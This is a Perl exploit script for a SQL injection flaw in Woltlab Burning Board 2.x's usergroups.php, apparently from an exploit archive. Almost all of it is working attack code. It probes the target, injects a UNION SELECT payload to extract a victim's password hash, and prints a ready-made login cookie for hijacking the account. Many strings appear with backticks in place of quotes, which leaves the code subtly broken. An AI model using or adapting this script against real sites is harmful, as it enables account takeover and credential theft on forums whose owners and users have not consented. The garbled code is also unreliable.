Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit#!/usr/bin/perl

#    Woltlab Burning Board 2.X usergroups.php SQL Injection exploit - burned2.pl

#    written by x666 <blueshisha@safe-mail.net>

#    jmp-esp.kicks-ass.net;blueshisha.chills.it

#    SR-CREW

#    should work on every wbb regardless of php settings.

#

#

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Response;

use HTTP::Status;

use Getopt::Std;

getopt('uiUpAcC');

our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_C );

my $target = shift;

sub do_request($$);

if ( !$target ) { &amp;HELP_MESSAGE; }

if ( !$opt_U &amp;&amp; !$opt_C) { &amp;HELP_MESSAGE; }

my ( $host, $folder );



if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) {



   $host = $1;

   $folder = ( $2 ? $2 : '/' );

   if ( $folder !~ /\/$/ ) { $folder .= '/'; }

   $target = `http://$host$folder` . 'usergroups.php';

}

else { &amp;HELP_MESSAGE; }



my $ip           = ( $opt_i ? $opt_i : '127.0.0.1' );

my ( $userid, $userpassword, $proxy, $proxyip );

( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U;

( $proxy,  $proxyip )      = split( ':', $opt_p ) if $opt_p;

my $uid = ( $opt_u ? $opt_u : 1 );

my $useragent =

 ( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

my $prefix = ( $opt_c ? $opt_c : 'wbb2_' );

my $isHash = 0;



print `burned2.pl written by x666\n`;

print `report errors \@ blueshisha\@safe-mail.net.. thx\n`;

print `[x] Attacking $target...\n`;



if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; }







if ( !$opt_c ) {



my $headers = do_request( '', '' );

if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) {

$prefix = $1;

     }

       else { print $headers}



   }



   print `[x] Cookie prefix: $prefix\n`;





print `[x] Vulnerable check:`;



my $answer;

my $pre;

$answer = do_request( '\'', '' );



if ( $answer =~ /FROM (.*?)_applications/ ) {

   $pre = $1;

   print ` Vulnerable\n`;




}



elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/

   or $answer =~ /Access denied/ )

{

   print ` No Idea\n`;

   print `[x] usergroups.php only for users,`;

   print ` wrong userdetails or wrong cookie-prefix!\n` if $opt_U;





   exit;

}

else {

   print ` Not Vulnerable!\n`;

       print $answer;

   exit;

}



print `[x] Unleashing black magic...\n`;


$answer = do_request(

   '/**/UNIoN/**/ SeLeCT/**/ CoNcAT(password,CHAR(39)),'.$userid.' FROM '.$pre.'_users wHere userid%3D'.$uid.'/*%5D',''

);



if ( $answer =~ /${folder}usergroups.php/ and $answer =~ /([a-f0-9]{32})/ ) {

   print `[x] Looks good!\n`;

   print `[x] Userid: $uid\n`;

   print `[x] Hash: $1\n`;

   if ( !$opt_C ) {

       print

`[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n`;

   }



}

else {

   print `[x] Looks bad!\n`;

  print $answer;



}



sub HELP_MESSAGE() {

   print `burned2.pl written by x666\n`

     . `perl $0 [options] url\n`

     . `examples:\n`

     . `perl $0 -U 10:123456 woltlab.de/de/forum/\n`

     . `perl $0 -u 2 -i 127.0.0.2 -U 10:123456 woltlab.de/de/forum/\n`

     . `overwrite -c only when the auto-check `

     . `gives you a false result\n`

     . `use -C when you need some special cookies\n`

     . `options :\n-u userid of victim [1]\n`

     . `-i faked client-ip [127.0.0.1]\n`

     . `-U userid:password or userid:pwhash [none]\n`

     . `-p proxyip:proxyport [none]\n`

     . `-A user-agent [firefox 1.5.09]\n`

     . `-c cookie-prefix [auto-check]\n`

     . `-C raw cookie\n`;


   exit;

}



sub do_request($$) {

   my $string   = shift;

   my $otherurl = shift;

   if ($otherurl) { $target = `http://$host$folder` . $otherurl; }

   else { $target = `http://$host$folder` . 'usergroups.php' }

   $string = '/*' if ( !$string );

   my $ua = LWP::UserAgent->new;

   if ($proxy) { $ua->proxy( 'http', `http://$proxy:$proxyip/` ); }

   my $request = new HTTP::Request( 'POST', $target );

   $request->content( 'applicationids%5B0)' . $string . '%5D=1'

         . '&amp;action=groupleaders_deleteapplications');

   $request->authorization_basic('projectb', 'neustart');

   $request->content_type('application/x-www-form-urlencoded');

   $request->header( 'User-Agent' => $useragent );



   if ($opt_U) {

       my $userhash;

       if ( !$isHash ) { $userhash = md5($userpassword); }

       else { $userhash = $userpassword; }

       my $cookie = $prefix

         . 'userid='

         . $userid . ';'

         . $prefix

         . 'userpassword='

         . $userhash;



       $request->header( 'Cookie' => $cookie );

   }

   elsif ($opt_C) {

       $request->header( 'Cookie' => $opt_C );

       $userid=3265;
   }

   $request->header( 'Client-Ip' => $ip );

   my $response = $ua->request($request);

   my $body     = $response->content;

   my $headers  = $response->headers_as_string;



   $body = $response->error_as_HTML if ( $response->is_error );



   return $headers if ( $string eq '/*' and !$response->is_error );

   return $body;

}



# MD5 Code ripped from Libwhisker for bigger portability

# thx rfp :)

{

   my ( @S, @T, @M );

   my $code = '';



   sub md5 {

       return undef if ( !defined $_[0] );    # oops, forgot the data

       my $DATA = _md5_pad( $_[0] );

       &amp;_md5_init() if ( !defined $M[0] );

       return _md5_perl_generated( \$DATA );

   }



   sub _md5_init {

       return if ( defined $S[0] );

       my $i;

       for ( $i = 1 ; $i <= 64 ; $i++ ) {

           $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );

       }

       my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );

       for ( $i = 0 ; $i < 64 ; $i++ ) {

           $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];

       }

       @M = (

           0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,

           1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,

           5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,

           0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9

       );

       &amp;_md5_generate();

       my $TEST = _md5_pad('foobar');



       if ( _md5_perl_generated( \$TEST ) ne

           '3858f62230ac3c915f300c664312c63f' )

       {

           die('Error: MD5 self-test not successful.');

       }

   }



   sub _md5_pad {

       my $l = length( my $msg = shift() . chr(128) );

       $msg .= `\0` x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );

       $l = ( $l - 1 ) * 8;

       $msg .= pack 'VV', $l &amp; 0xffffffff, ( $l >> 16 >> 16 );

       return $msg;

   }



   sub _md5_generate {

       my $N = 'abcddabccdabbcda';

       my ( $i, $M ) = ( 0, '' );

       $M    = '&amp;0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems

       $code = <<EOT;

       sub _md5_perl_generated {

   BEGIN { \$^H |= 1; }; # use integer

       my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);

       my (\$a,\$b,\$c,\$d,\$t,\$i);

       my \$dr=shift;

       my \$l=length(\$\$dr);

       for my \$L (0 .. ((\$l/64)-1) ) {

               my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));

               (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

       for ( $i = 0 ; $i < 16 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             `\$t=((\$$d^(\$$b\&amp;(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n`;

           $code .=

`\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&amp;((1<<$S[$i])-1)))+\$$b)$M;\n`;

       }

       for ( ; $i < 32 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             `\$t=((\$$c^(\$$d\&amp;(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n`;

           $code .=

`\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&amp;((1<<$S[$i])-1)))+\$$b)$M;\n`;

       }

       for ( ; $i < 48 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= `\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n`;

           $code .=

`\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&amp;((1<<$S[$i])-1)))+\$$b)$M;\n`;

       }

       for ( ; $i < 64 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= `\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n`;

           $code .=

`\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&amp;((1<<$S[$i])-1)))+\$$b)$M;\n`;

       }

       $code .= <<EOT;

               \$A=\$A+\$a\&amp;0xffffffff; \$B=\$B+\$b\&amp;0xffffffff;

               \$C=\$C+\$c\&amp;0xffffffff; \$D=\$D+\$d\&amp;0xffffffff;

       } # for

   return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

       eval `$code`;

   }

}    # md5 package container

# milw0rm.com [2007-03-15]